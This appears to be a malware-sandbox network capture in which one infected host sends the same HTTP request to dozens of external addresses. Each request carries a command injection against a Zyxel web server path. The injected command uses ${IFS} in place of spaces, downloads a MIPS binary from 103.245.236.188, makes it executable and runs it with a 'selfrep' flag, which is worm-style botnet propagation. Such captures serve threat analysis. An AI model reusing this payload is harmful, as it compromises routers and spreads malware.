                                    Jan 13, 2024 19:02:47.483345985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7698192.168.2.135132498.105.163.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483378887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7699192.168.2.1345118154.198.167.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483443022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7700192.168.2.1352606187.75.179.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483500004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7701192.168.2.133909849.89.179.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483530998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7702192.168.2.1351034138.186.135.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483613968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7703192.168.2.134925668.26.122.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483644009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7704192.168.2.1359496146.215.217.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483686924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7705192.168.2.1340026195.179.29.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483742952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7706192.168.2.134965046.127.71.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483809948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7707192.168.2.1347932182.110.22.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483848095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7708192.168.2.1335918197.47.178.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483926058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7709192.168.2.133450841.243.26.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483971119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7710192.168.2.1355450140.35.234.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484004974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7711192.168.2.134919013.181.111.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484035969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7712192.168.2.1343360193.218.125.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484085083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7713192.168.2.135996032.89.243.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484133959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7714192.168.2.135309249.138.200.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484191895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7715192.168.2.1357634192.227.83.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484262943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7716192.168.2.134155680.198.44.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484312057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7717192.168.2.1340966204.251.30.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484359980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7718192.168.2.134669234.23.93.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484411001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7719192.168.2.1352522158.82.228.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484483004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7720192.168.2.1343188205.199.211.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484520912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7721192.168.2.133827213.141.8.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484596014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7722192.168.2.1356760114.132.27.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484646082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7723192.168.2.134228086.11.249.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484690905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7724192.168.2.133794031.40.205.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484731913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7725192.168.2.134025849.38.227.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484767914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7726192.168.2.1336264142.139.30.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484807968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7727192.168.2.133491883.232.208.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484841108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7728192.168.2.1357266136.43.222.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484920025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7729192.168.2.1338454201.200.19.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.484978914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7730192.168.2.1359224154.131.173.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485004902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7731192.168.2.1354222149.248.243.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485074043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7732192.168.2.1356302125.68.162.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485095978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7733192.168.2.1338570159.31.131.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485136032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7734192.168.2.1355098159.205.92.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485193968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7735192.168.2.136038491.140.5.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485233068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7736192.168.2.13506509.12.0.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485285997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7737192.168.2.1335302117.69.95.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485343933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7738192.168.2.1341474216.208.244.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485392094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7739192.168.2.135687417.231.83.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485440016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7740192.168.2.1351498169.139.73.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485486031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7741192.168.2.1343090202.128.140.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485551119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7742192.168.2.1360012212.241.15.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485574007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7743192.168.2.134701499.226.163.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485620975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7744192.168.2.1353084102.251.145.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485677958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7745192.168.2.1335280166.225.165.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485728979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7746192.168.2.1339190124.163.124.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485778093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7747192.168.2.1349504120.180.17.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485829115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7748192.168.2.1347962175.233.235.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485867977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7749192.168.2.1360672137.86.109.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485928059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7750192.168.2.1356438193.135.235.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.485989094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7751192.168.2.1343108105.149.57.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486033916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7752192.168.2.133386672.126.65.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486123085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7753192.168.2.1339704198.137.148.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486156940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7754192.168.2.1354252156.179.153.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486160994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7755192.168.2.1339352141.204.179.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486206055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7756192.168.2.135994466.204.1.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486289978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7757192.168.2.1345644136.12.211.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486346006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7758192.168.2.1333532143.76.165.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486393929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7759192.168.2.1343734134.220.114.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.486435890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7760192.168.2.136090014.178.32.35443
                                    TimestampBytes transferredDirectionData
